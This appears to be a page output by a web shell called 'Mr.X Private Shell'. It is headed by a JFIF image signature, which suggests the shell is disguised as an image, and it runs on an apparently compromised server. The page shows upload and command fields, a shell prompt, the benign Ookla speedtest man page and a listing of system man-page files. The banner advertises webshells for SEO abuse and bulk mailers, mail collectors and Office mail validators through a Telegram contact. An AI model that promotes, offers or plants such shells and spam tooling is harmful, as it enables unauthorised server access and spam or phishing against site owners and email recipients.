����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.204: ~ $
.\" generated with Ronn/v0.7.3
.\" http://github.com/rtomayko/ronn/tree/0.7.3
.
.TH "SPEEDTEST" "5" "July 2022" "Ookla" " Speedtest 1.2.0.84"
.
.SH "NAME"
\fBspeedtest\fR \- Speedtest CLI by Ookla is the official command line client for testing the speed and performance of your internet connection\.
.
.SH "SYNOPSIS"
\fBspeedtest\fR [\fBhelp\fR] [\fB\-aAbBfhiIpPsv\fR] [\fB\-\-ca\-certificate=path\fR] [\fB\-\-format=\fR\fIformat\-type\fR] [\fB\-\-interface=interface\fR] [\fB\-\-ip=ip_address\fR] [\fB\-\-output\-header\fR] [\fB\-\-precision\fR=\fInum_decimal_places\fR] [\fB\-\-progress\fR=\fIyes|no\fR] [\fB\-\-selection\-details\fR] [\fB\-\-server\-id\fR=\fIid\fR] [\fB\-\-servers\fR] [\fB\-\-unit\fR=\fIunit\-of\-measure\fR] [\fB\-\-version\fR]
.
.SH "DESCRIPTION"
\fBspeedtest\fR is an application that measures the latency, jitter, packet loss, download bandwidth, and upload bandwidth of the network connection between the client and a nearby Speedtest Server\.
.
.SH "OPTIONS"
.
.TP
\fB\-h, \-\-help\fR
Print usage information
.
.TP
\fB\-v\fR
Logging verbosity, specify multiple times for higher verbosity (e\.g\. \fB\-vvv\fR)
.
.TP
\fB\-V, \-\-version\fR
Print version number
.
.TP
\fB\-L, \-\-servers\fR
List nearest servers
.
.TP
\fB\-\-selection\-details\fR
Show server selection details
.
.TP
\fB\-s\fR \fIid\fR, \fB\-\-server\-id\fR=\fIid\fR
Specify a server from the server list using its id
.
.TP
\fB\-o\fR \fIhostname\fR, \fB\-\-host\fR=\fIhostname\fR
Specify a server from the server list using its hostname
.
.TP
\fB\-f\fR \fIformat_type\fR, \fB\-\-format\fR=\fIformat_type\fR
Output format (default is \fIhuman\-readable\fR)\. See \fIOUTPUT FORMATS\fR below for details\.
.
.TP
\fB\-\-progress\-update\-interval\fR=\fIinterval\fR
Progress update interval (100\-1000 milliseconds)
.
.TP
\fB\-\-output\-header\fR
Show output header for CSV and TSV formats
.
.TP
\fB\-u\fR \fIunit_of_measure\fR, \fB\-\-unit\fR=\fIunit_of_measure\fR
Output unit for displaying speeds when using the \fIhuman\-readable\fR output format\. The default unit is Mbps\. See \fIUNITS OF MEASURE\fR for more details\.
.
.TP
\fB\-a\fR
Shortcut for [\fB\-u\fR \fIauto\-decimal\-bits\fR]
.
.TP
\fB\-A\fR
Shortcut for [\fB\-u\fR \fIauto\-decimal\-bytes\fR]
.
.TP
\fB\-b\fR
Shortcut for [\fB\-u\fR \fIauto\-binary\-bits\fR]
.
.TP
\fB\-B\fR
Shortcut for [\fB\-u\fR \fIauto\-binary\-bytes\fR]
.
.TP
\fB\-P\fR \fIdecimal_places\fR, \fB\-\-precision\fR=\fIdecimal_places\fR
Number of decimal places to use (default = 2, valid = 0\-8)\. Only applicable to the \fIhuman\-readable\fR output format\.
.
.TP
\fB\-p\fR \fIyes\fR|\fIno\fR, \fB\-\-progress\fR=\fIyes\fR|\fIno\fR
Enable or disable progress bar (default is \fIyes\fR when interactive)
.
.TP
\fB\-I\fR \fIinterface\fR, \fB\-\-interface\fR=\fIinterface\fR
Attempt to bind to the specified interface when connecting to servers
.
.TP
\fB\-i\fR \fIip_address\fR, \fB\-\-ip\fR=\fIip_address\fR
Attempt to bind to the specified IP address when connecting to servers
.
.TP
\fB\-\-ca\-certificate\fR=\fIpath\fR
Path to CA Certificate bundle, see \fISSL CERTIFICATE LOCATIONS\fR below\.
.
.SH "OUTPUT FORMATS"
These are the available output formats for Speedtest CLI specified with the \fB\-f\fR or \fB\-\-format\fR flags\. All machine readable formats (csv, tsv, json, jsonl, json\-pretty) use bytes for data sizes, bytes per seconds for speeds and milliseconds for durations\. They also always use maximum precision output\.
.
.TP
\fBhuman\-readable\fR
human readable output
.
.TP
\fBcsv\fR
comma separated values
.
.TP
\fBtsv\fR
tab separated values
.
.TP
\fBjson\fR
javascript object notation (compact)
.
.TP
\fBjsonl\fR
javascript object notation (lines)
.
.TP
\fBjson\-pretty\fR
javascript object notation (pretty)
.
.SH "UNITS OF MEASURE"
For the human\-readable output format, you can specify the unit of measure to use\. The default unit is \fIMbps\fR\. The supported units are listed below\.
.
.P
These units do not apply to machine readable output formats (json, jsonl, csv and tsv)\.
.
.SS "Decimal options (multipliers of 1000)"
.
.TP
\fBbps\fR
bits per second
.
.TP
\fBkbps\fR
kilobits per second
.
.TP
\fBMbps\fR
megabits per second
.
.TP
\fBGbps\fR
gigabits per second
.
.TP
\fBB/s\fR
bytes per second
.
.TP
\fBkB/s\fR
kilobytes per second
.
.TP
\fBMB/s\fR
megabytes per second
.
.TP
\fBGB/s\fR
gigabytes per second
.
.SS "Binary options (multipliers of 1024)"
.
.TP
\fBkibps\fR
kibibits per second
.
.TP
\fBMibps\fR
mebibits per second
.
.TP
\fBGibps\fR
gibibits per second
.
.TP
\fBkiB/s\fR
kibibytes per second
.
.TP
\fBMiB/s\fR
mebibytes per second
.
.TP
\fBGiB/s\fR
gibibytes per second
.
.SS "Auto\-scaling options"
Automatic units will scale the prefix depending on the measured speed\.
.
.TP
\fBauto\-decimal\-bits\fR
automatic in decimal bits
.
.TP
\fBauto\-decimal\-bytes\fR
automatic in decimal bytes
.
.TP
\fBauto\-binary\-bits\fR
automatic in binary bits
.
.TP
\fBauto\-binary\-bytes\fR
automatic in binary bytes
.
.SH "TERMS OF USE AND PRIVACY POLICY NOTICES"
You may only use this Speedtest software and information generated from it for personal, non\-commercial use, through a command line interface on a personal computer\. Your use of this software is subject to the End User License Agreement, Terms of Use and Privacy Policy at these URLs:
.
.IP "\(bu" 4
\fIhttps://www\.speedtest\.net/about/eula\fR
.
.IP "\(bu" 4
\fIhttps://www\.speedtest\.net/about/terms\fR
.
.IP "\(bu" 4
\fIhttps://www\.speedtest\.net/about/privacy\fR
.
.IP "" 0
.
.SH "OUTPUT"
Upon successful execution, the application will exit with an exit code of 0\. The result will include latency, jitter, download, upload, packet loss (where available), and a result URL\.
.
.P
Latency and jitter will be represented in milliseconds\. Download and upload units will depend on the output format as well as if a unit was specified\. The human\-readable format defaults to Mbps and any machine\-readable formats (csv, tsv, json, jsonl, json\-pretty) use bytes as the unit of measure with max precision\. Packet loss is represented as a percentage, or \fBNot available\fR when packet loss is unavailable in the executing network environment\.
.
.P
The bytes per second measurements can be transformed into the human\-readable output format default unit of megabits (Mbps) by dividing the bytes per second value by 125,000\. For example:
.
.P
38404104 bytes per second = 38404104 / 125 = 307232\.832 kilobits per second = 307232\.832 / 1000 = 307\.232832 megabits per second
.
.P
The value 125 is derived from 1000 / 8 as follows:
.
.P
1 byte = 8 bits 1 kilobit = 1000 bits
.
.P
38404104 bytes per second = 38404104 * 8 bits per byte = 307232832 bits per second = 307232832 / 1000 bits per kilobit = 307232\.832 kilobits per second
.
.P
The Result URL is available to share your result, appending \fB\.png\fR to the Result URL will create a shareable result image\.
.
.P
\fIExample human\-readable result:\fR
.
.IP "" 4
.
.nf

$ speedtest
   Speedtest by Ookla

      Server: SUNET \- Stockholm (id: 26852)
         ISP: Bahnhof AB
Idle Latency:     5\.04 ms   (jitter: 0\.04ms, low: 5\.01ms, high: 5\.07ms)
    Download:   968\.73 Mbps (data used: 117\.5 MB)
                 12\.10 ms   (jitter: 1\.71ms, low: 6\.71ms, high: 18\.82ms)
      Upload:   942\.13 Mbps (data used: 114\.8 MB)
                  9\.94 ms   (jitter: 1\.10ms, low: 5\.30ms, high: 12\.72ms)
 Packet Loss:     0\.0%
  Result URL: https://www\.speedtest\.net/result/c/d1c46724\-50a3\-4a59\-87ca\-ffc09ea014b2
.
.fi
.
.IP "" 0
.
.SH "NETWORK TIMEOUT VALUES"
By default, network requests set a timeout of \fB10\fR seconds\. The only exception to this is latency testing, which sets a timeout of \fB15\fR seconds\.
.
.SH "FATAL ERRORS"
Upon fatal errors, the application will exit with a non\-zero exit code\.
.
.P
\fBInitialization Fatal Error Examples:\fR
.
.P
\fIConfiguration \- Couldn\'t connect to server (Network is unreachable)\fR
.
.P
\fIConfiguration \- Could not retrieve or read configuration (ConfigurationError)\fR
.
.P
\fBStage Execution Fatal Error Example:\fR
.
.P
\fI[error] Error: [1] Latency test failed for HTTP\fR
.
.P
\fI[error] Error: [36] Cannot open socket: Operation now in progress\fR
.
.P
\fI[error] Failed to resolve host name\. Cancelling test suite\.\fR
.
.P
\fI[error] Host resolve failed: Exec format error\fR
.
.P
\fI[error] Cannot open socket: No route to host\fR
.
.P
\fI[error] Server Selection \- Failed to find a working test server\. (NoServers)\fR
.
.SH "SSL CERTIFICATE LOCATIONS"
By default the following paths are checked for CA certificate bundles on linux machines:
.
.IP "" 4
.
.nf

/etc/ssl/certs/ca\-certificates\.crt
/etc/pki/tls/certs/ca\-bundle\.crt
/usr/share/ssl/certs/ca\-bundle\.crt
/usr/local/share/certs/ca\-root\-nss\.crt
/etc/ssl/cert\.pem
.
.fi
.
.IP "" 0
.
.P
If the device under test does \fInot\fR have one of the above mentioned files, then the canonical and up to date CA certificate bundle provided by the curl project can be manually downloaded into a specific location\. This specific location can be provided as a parameter per the following example:
.
.IP "" 4
.
.nf

wget https://curl\.se/ca/cacert\.pem
\./ookla \-\-ca\-certificate=\./cacert\.pem
.
.fi
.
.IP "" 0
.
.SH "RELEASE NOTES"
.
.SS "1\.2\.0 (2022\-07\-27)"
.
.IP "\(bu" 4
Cleaned up formatting in human\-readable output for additional data within parenthesis (now using \fBlabel: value\fR consistently)
.
.IP "\(bu" 4
Compressed result upload data to reduce data usage
.
.IP "\(bu" 4
Added support for measuring responsiveness (latency during load)
.
.IP "\(bu" 4
Added experimental support for multi\-server testing
.
.IP "\(bu" 4
Updated third\-party dependencies: cURL 7\.83\.1, mbed TLS 3\.1\.0, Boost 1\.79\.0
.
.IP "\(bu" 4
Added stability improvements
.
.IP "" 0
.
.SS "1\.1\.1 (2021\-11\-15)"
.
.IP "\(bu" 4
Fixed issue with reported client version in uploaded results
.
.IP "" 0
.
.SS "1\.1\.0 (2021\-10\-27)"
.
.IP "\(bu" 4
Use server\-side upload measurements
.
.IP "\(bu" 4
Performance enhancement on upload tests for CPU constrained devices
.
.IP "\(bu" 4
Security enhancements
.
.IP "\(bu" 4
Fix for deadlock bug
.
.IP "\(bu" 4
Fix crash due to race condition
.
.IP "\(bu" 4
Fix crash in hostname resolution during test initialization
.
.IP "\(bu" 4
Fix potential buffer overflow
.
.IP "\(bu" 4
Update Boost to 1\.77\.0
.
.IP "\(bu" 4
Update mbed TLS to 2\.27\.0
.
.IP "\(bu" 4
Update cURL to 7\.78\.0
.
.IP "" 0
.
.SS "1\.0\.0 (2019\-10\-29)"
.
.IP "\(bu" 4
Initial release
.
.IP "" 0
.
.SH "COPYRIGHT NOTICES FOR THIRD\-PARTY PRODUCTS/LIBRARIES"
This software incorporates free and open source third\-party libraries, including:
.
.IP "\(bu" 4
boost \fIhttps://www\.boost\.org/\fR
.
.IP "\(bu" 4
libcurl \fIhttps://curl\.haxx\.se/libcurl/\fR
.
.IP "\(bu" 4
petopt \fIhttps://www\.lysator\.liu\.se/~pen/petopt/\fR
.
.IP "\(bu" 4
mbed TLS \fIhttps://tls\.mbed\.org/\fR
.
.IP "\(bu" 4
ca\-certificates extract \fIhttps://curl\.haxx\.se/docs/caextract\.html\fR
.
.IP "\(bu" 4
L\. Peter Deutsch’s md5 \fIhttps://sourceforge\.net/projects/libmd5\-rfc/files/\fR
.
.IP "\(bu" 4
getopt\.h \fIin%20Windows%20version%20of%20this%20software\fR
.
.IP "\(bu" 4
tiny\-aes \fIhttps://github\.com/kokke/tiny\-AES\-c\fR
.
.IP "\(bu" 4
PicoSHA2 \fIhttps://github\.com/okdshin/PicoSHA2\fR
.
.IP "\(bu" 4
musl \fIhttps://www\.musl\-libc\.org/\fR
.
.IP "" 0
.
.P
Inclusion of mbed TLS is subject to presentation of the following license terms to recipients of this software: \fIhttp://www\.apache\.org/licenses/LICENSE\-2\.0\fR (a copy of which is included with the documentation of this software)
.
.SS "Inclusion of libcurl is subject to distribution of the software with the following notice:"
.
.nf

Copyright (c) 1996 \- 2019, Daniel Stenberg, daniel@haxx\.se, and many contributors,
see the THANKS file\.  All rights reserved\.  Permission to use, copy, modify, and distribute
this software for any purpose with or without fee is hereby granted, provided that
the above copyright notice and this permission notice appear in all copies\.
.
.fi
.
.SS "Inclusion of getopt\.h is subject to distribution of the software with the following notice:"
.
.nf

DISCLAIMER
This file is part of the mingw\-w64 runtime package\.

The mingw\-w64 runtime package and its code is distributed in the hope that it
will be useful but WITHOUT ANY WARRANTY\.  ALL WARRANTIES, EXPRESSED OR
IMPLIED ARE HEREBY DISCLAIMED\.  This includes but is not limited to
warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE\.


Copyright (c) 2002 Todd C\. Miller <Todd\.Miller@courtesan\.com>

Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies\.

Copyright (c) 2000 The NetBSD Foundation, Inc\.
All rights reserved\.

This code is derived from software contributed to The NetBSD Foundation
by Dieter Baron and Thomas Klausner\.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1\. Redistributions of source code must retain the above copyright
   notice, this list of conditions and the following disclaimer\.
2\. Redistributions in binary form must reproduce the above copyright
   notice, this list of conditions and the following disclaimer in the
   documentation and/or other materials provided with the distribution\.
.
.fi
.
.SS "Inclusion of PicoSHA2 is subject to distribution of the software with the following notice:"
.
.nf

Copyright (c) 2017 okdshin

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software\.
.
.fi
.
.SS "Inclusion of musl is subject to distribution of the software with the following notice:"
.
.nf

Copyright © 2005\-2019 Rich Felker, et al\.

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software\.
.
.fi


Filemanager

Name Type Size Permission Actions
.k5identity.5.gz File 42 B 0644
.k5login.5.gz File 39 B 0644
Compose.5.gz File 2.53 KB 0644
NetworkManager.conf.5.gz File 18.41 KB 0644
XCompose.5.gz File 39 B 0644
access.conf.5.gz File 2.71 KB 0644
acl.5.gz File 4.98 KB 0644
adjtime_config.5.gz File 1.44 KB 0644
anacrontab.5.gz File 1.79 KB 0644
at.allow.5.gz File 433 B 0644
at.deny.5.gz File 433 B 0644
auditd-plugins.5.gz File 2.18 KB 0644
auditd.conf.5.gz File 6.68 KB 0644
ausearch-expression.5.gz File 2 KB 0644
authselect-profiles.5.gz File 3.07 KB 0644
binfmt.d.5.gz File 1.58 KB 0644
cert9.db.5.gz File 847 B 0644
chrony.conf.5.gz File 46.29 KB 0644
config-util.5.gz File 480 B 0644
console.apps.5.gz File 439 B 0644
console.handlers.5.gz File 850 B 0644
console.perms.5.gz File 1005 B 0644
coredump.conf.5.gz File 2.27 KB 0644
coredump.conf.d.5.gz File 45 B 0644
cpio.5.gz File 5.04 KB 0644
crontab.5.gz File 5.53 KB 0644
crypt.5.gz File 4.38 KB 0644
crypttab.5.gz File 10.61 KB 0644
customizable_types.5.gz File 795 B 0644
default_contexts.5.gz File 819 B 0644
default_type.5.gz File 590 B 0644
depmod.d.5.gz File 1.72 KB 0644
dhclient.conf.5.gz File 10.78 KB 0644
dhclient.leases.5.gz File 1.07 KB 0644
dhcp-eval.5.gz File 6.71 KB 0644
dhcp-options.5.gz File 22.24 KB 0644
dnf-transaction-json.5.gz File 1.33 KB 0644
dnf.conf.5.gz File 11.98 KB 0644
dnssec-trust-anchors.d.5.gz File 2.75 KB 0644
dovecot.conf.5.gz File 393 B 0644
dpkg.cfg.5.gz File 1.33 KB 0644
dracut.conf.5.gz File 4.81 KB 0644
e2fsck.conf.5.gz File 5.66 KB 0644
editrc.5.gz File 3.04 KB 0644
environment.5.gz File 44 B 0644
environment.d.5.gz File 2.36 KB 0644
ethers.5.gz File 548 B 0644
exports.5.gz File 8.91 KB 0644
ext2.5.gz File 10.78 KB 0644
ext3.5.gz File 10.78 KB 0644
ext4.5.gz File 10.78 KB 0644
extension-release.5.gz File 42 B 0644
faillock.conf.5.gz File 2.03 KB 0644
failsafe_context.5.gz File 790 B 0644
file_contexts.5.gz File 44 B 0644
file_contexts.homedirs.5.gz File 44 B 0644
file_contexts.local.5.gz File 44 B 0644
file_contexts.subs.5.gz File 44 B 0644
file_contexts.subs_dist.5.gz File 44 B 0644
fingerprint-auth.5.gz File 645 B 0644
fips_config.5ossl.gz File 2.32 KB 0644
flatpak-flatpakref.5.gz File 2.38 KB 0644
flatpak-flatpakrepo.5.gz File 2.39 KB 0644
flatpak-installation.5.gz File 1.07 KB 0644
flatpak-metadata.5.gz File 7.43 KB 0644
flatpak-remote.5.gz File 1.94 KB 0644
fonts-conf.5.gz File 11.12 KB 0644
freetds.conf.5.gz File 2.39 KB 0644
fstab.5.gz File 2.99 KB 0644
fwupd-remotes.d.5.gz File 1.88 KB 0644
fwupd.conf.5.gz File 4.85 KB 0644
genisoimagerc.5.gz File 1.37 KB 0644
geoclue.5.gz File 1.35 KB 0644
gitattributes.5.gz File 16.3 KB 0644
gitformat-bundle.5.gz File 1.84 KB 0644
gitformat-chunk.5.gz File 2.54 KB 0644
gitformat-commit-graph.5.gz File 3.69 KB 0644
gitformat-index.5.gz File 6.01 KB 0644
gitformat-loose.5.gz File 1.32 KB 0644
gitformat-pack.5.gz File 10.1 KB 0644
gitformat-signature.5.gz File 3.3 KB 0644
githooks.5.gz File 9.22 KB 0644
gitignore.5.gz File 3.76 KB 0644
gitmailmap.5.gz File 1.7 KB 0644
gitmodules.5.gz File 2.35 KB 0644
gitprotocol-capabilities.5.gz File 6.09 KB 0644
gitprotocol-common.5.gz File 2.05 KB 0644
gitprotocol-http.5.gz File 6.61 KB 0644
gitprotocol-pack.5.gz File 9.68 KB 0644
gitprotocol-v2.5.gz File 12.67 KB 0644
gitrepository-layout.5.gz File 5.82 KB 0644
group.conf.5.gz File 1.95 KB 0644
gshadow.5.gz File 1.23 KB 0644
gssproxy.conf.5.gz File 3.79 KB 0644
hostname.5.gz File 1.58 KB 0644
idmapd.conf.5.gz File 4.16 KB 0644
info.5.gz File 750 B 0644
initrd-release.5.gz File 42 B 0644
integritytab.5.gz File 1.83 KB 0644
journald.conf.5.gz File 7.09 KB 0644
journald.conf.d.5.gz File 45 B 0644
journald@.conf.5.gz File 45 B 0644
k5identity.5.gz File 1.18 KB 0644
k5login.5.gz File 1.15 KB 0644
kdump.conf.5.gz File 4.77 KB 0644
key.dns_resolver.conf.5.gz File 1.01 KB 0644
key4.db.5.gz File 850 B 0644
keymaps.5.gz File 4.81 KB 0644
krb5.conf.5.gz File 14.58 KB 0644
ldap.conf.5.gz File 6.08 KB 0644
ldif.5.gz File 2.49 KB 0644
libaudit.conf.5.gz File 553 B 0644
libnftables-json.5.gz File 9.61 KB 0644
libuser.conf.5.gz File 3.7 KB 0644
limits.conf.5.gz File 2.88 KB 0644
locale.conf.5.gz File 1.33 KB 0644
localtime.5.gz File 932 B 0644
login.defs.5.gz File 7.19 KB 0644
logind.conf.5.gz File 5 KB 0644
logind.conf.d.5.gz File 43 B 0644
logrotate.conf.5.gz File 41 B 0644
machine-id.5.gz File 3.24 KB 0644
machine-info.5.gz File 1.92 KB 0644
magic.5.gz File 7.58 KB 0644
mailcap.5.gz File 3.8 KB 0644
makedumpfile.conf.5.gz File 3.91 KB 0644
manpath.5.gz File 2.12 KB 0644
media.5.gz File 45 B 0644
mke2fs.conf.5.gz File 5.47 KB 0644
modprobe.conf.5.gz File 3.05 KB 0644
modprobe.d.5.gz File 3.05 KB 0644
modules-load.d.5.gz File 1.54 KB 0644
modules.dep.5.gz File 1.02 KB 0644
modules.dep.bin.5.gz File 43 B 0644
moduli.5.gz File 1.76 KB 0644
mtools.5.gz File 6.54 KB 0644
mtools.conf.5.gz File 6.54 KB 0644
mtree.5.gz File 3.19 KB 0644
named.conf.5.gz File 5.72 KB 0644
namespace.conf.5.gz File 2.81 KB 0644
nanorc.5.gz File 11.61 KB 0644
netrc.5.gz File 2.02 KB 0644
nfs.5.gz File 19.52 KB 0644
nfs.conf.5.gz File 2.37 KB 0644
nfsmount.conf.5.gz File 1.44 KB 0644
nfsrahead.5.gz File 684 B 0644
nm-settings-dbus.5.gz File 41.05 KB 0644
nm-settings-ifcfg-rh.5.gz File 16.16 KB 0644
nm-settings-keyfile.5.gz File 4.92 KB 0644
nm-settings-nmcli.5.gz File 47.42 KB 0644
nm-settings.5.gz File 47.42 KB 0644
nm-system-settings.conf.5.gz File 18.41 KB 0644
odbc.ini.5.gz File 1.27 KB 0644
odbcinst.ini.5.gz File 1.49 KB 0644
openssl.cnf.5.gz File 9.46 KB 0644
org.freedesktop.LogControl1.5.gz File 1.5 KB 0644
org.freedesktop.hostname1.5.gz File 4.92 KB 0644
org.freedesktop.locale1.5.gz File 2.04 KB 0644
org.freedesktop.login1.5.gz File 10.72 KB 0644
org.freedesktop.systemd1.5.gz File 32.87 KB 0644
org.freedesktop.timedate1.5.gz File 2.42 KB 0644
os-release.5.gz File 7.57 KB 0644
pam.conf.5.gz File 4.64 KB 0644
pam.d.5.gz File 40 B 0644
pam_env.conf.5.gz File 1.78 KB 0644
papersize.5.gz File 890 B 0644
password-auth.5.gz File 645 B 0644
pc.5.gz File 2.11 KB 0644
pipewire-client.conf.5.gz File 2.28 KB 0644
pipewire-filter-chain.conf.5.gz File 535 B 0644
pipewire-jack.conf.5.gz File 4.03 KB 0644
pipewire-pulse.conf.5.gz File 1.87 KB 0644
pipewire.conf.5.gz File 6.43 KB 0644
pkcs11.conf.5.gz File 3.05 KB 0644
pkcs11.txt.5.gz File 949 B 0644
pkgconf-personality.5.gz File 1.36 KB 0644
png.5.gz File 1.12 KB 0644
postlogin.5.gz File 593 B 0644
projects.5.gz File 371 B 0644
projid.5.gz File 376 B 0644
pstore.conf.5.gz File 1.75 KB 0644
pstore.conf.d.5.gz File 43 B 0644
pwhistory.conf.5.gz File 1.19 KB 0644
pwquality.conf.5.gz File 2.97 KB 0644
removable_context.5.gz File 562 B 0644
repart.d.5.gz File 8.83 KB 0644
request-key.conf.5.gz File 1.96 KB 0644
rndc.conf.5.gz File 2.18 KB 0644
rsyncd.conf.5.gz File 19.31 KB 0644
rsyslog.conf.5.gz File 11.35 KB 0644
scr_dump.5.gz File 5.25 KB 0644
secolor.conf.5.gz File 1.12 KB 0644
securetty_types.5.gz File 626 B 0644
selabel_db.5.gz File 2.8 KB 0644
selabel_file.5.gz File 3.16 KB 0644
selabel_media.5.gz File 1.4 KB 0644
selabel_x.5.gz File 2.43 KB 0644
selinux_config.5.gz File 1.78 KB 0644
semanage.conf.5.gz File 2.05 KB 0644
sepermit.conf.5.gz File 1.16 KB 0644
sepgsql_contexts.5.gz File 42 B 0644
service_seusers.5.gz File 800 B 0644
sestatus.conf.5.gz File 766 B 0644
seusers.5.gz File 773 B 0644
shadow.5.gz File 1.85 KB 0644
sleep.conf.d.5.gz File 50 B 0644
smartcard-auth.5.gz File 645 B 0644
smartd.conf.5.gz File 20.08 KB 0644
speedtest.5 File 14.57 KB 0644
ssh_config.5.gz File 19.75 KB 0644
sshd_config.5.gz File 18.91 KB 0644
sss-certmap.5.gz File 5.68 KB 0644
sss_rpcidmapd.5.gz File 1.24 KB 0644
sssd-files.5.gz File 2 KB 0644
sssd-session-recording.5.gz File 1.75 KB 0644
sssd-simple.5.gz File 2.01 KB 0644
sssd-sudo.5.gz File 3.02 KB 0644
sssd-systemtap.5.gz File 1.98 KB 0644
sssd.conf.5.gz File 27 KB 0644
subgid.5.gz File 1.34 KB 0644
subuid.5.gz File 1.33 KB 0644
sudo-ldap.conf.5.gz File 44 B 0644
sudo.conf.5.gz File 7.75 KB 0644
sudoers.5.gz File 52.04 KB 0644
sudoers.ldap.5.gz File 13.52 KB 0644
sudoers_timestamp.5.gz File 4.04 KB 0644
sysctl.conf.5.gz File 1.08 KB 0644
sysctl.d.5.gz File 3.01 KB 0644
sysstat.5.gz File 2.35 KB 0644
system-auth.5.gz File 645 B 0644
system.conf.d.5.gz File 46 B 0644
systemd-sleep.conf.5.gz File 2.61 KB 0644
systemd-system.conf.5.gz File 8.14 KB 0644
systemd-user-runtime-dir.5.gz File 43 B 0644
systemd-user.conf.5.gz File 46 B 0644
systemd.automount.5.gz File 2.24 KB 0644
systemd.device.5.gz File 2.23 KB 0644
systemd.dnssd.5.gz File 2.88 KB 0644
systemd.exec.5.gz File 48.72 KB 0644
systemd.kill.5.gz File 2.23 KB 0644
systemd.link.5.gz File 9.74 KB 0644
systemd.mount.5.gz File 5.72 KB 0644
systemd.nspawn.5.gz File 4.7 KB 0644
systemd.path.5.gz File 2.87 KB 0644
systemd.preset.5.gz File 3.12 KB 0644
systemd.resource-control.5.gz File 12.63 KB 0644
systemd.scope.5.gz File 2.6 KB 0644
systemd.service.5.gz File 18.4 KB 0644
systemd.slice.5.gz File 1.64 KB 0644
systemd.socket.5.gz File 9.49 KB 0644
systemd.swap.5.gz File 2.82 KB 0644
systemd.target.5.gz File 1.78 KB 0644
systemd.timer.5.gz File 5.02 KB 0644
systemd.unit.5.gz File 26.39 KB 0644
sysupdate.d.5.gz File 9.72 KB 0644
sysusers.d.5.gz File 3.97 KB 0644
tar.5.gz File 10.79 KB 0644
teamd.conf.5.gz File 3.6 KB 0644
term.5.gz File 5.8 KB 0644
terminal-colors.d.5.gz File 2.28 KB 0644
terminfo.5.gz File 36.33 KB 0644
time.conf.5.gz File 1.97 KB 0644
tmpfiles.d.5.gz File 10.75 KB 0644
tuned-main.conf.5.gz File 1.89 KB 0644
tuned.conf.5.gz File 1.35 KB 0644
udev.conf.5.gz File 1.21 KB 0644
user-runtime-dir@.service.5.gz File 43 B 0644
user.conf.d.5.gz File 46 B 0644
user@.service.5.gz File 2.41 KB 0644
user_caps.5.gz File 5.96 KB 0644
user_contexts.5.gz File 939 B 0644
vconsole.conf.5.gz File 1.36 KB 0644
veritytab.5.gz File 2.52 KB 0644
virc.5.gz File 34 B 0644
virtual_domain_context.5.gz File 620 B 0644
virtual_image_context.5.gz File 615 B 0644
x509v3_config.5ossl.gz File 8.65 KB 0644
x_contexts.5.gz File 41 B 0644
xfs.5.gz File 5 KB 0644
yum.conf.5.gz File 11.99 KB 0644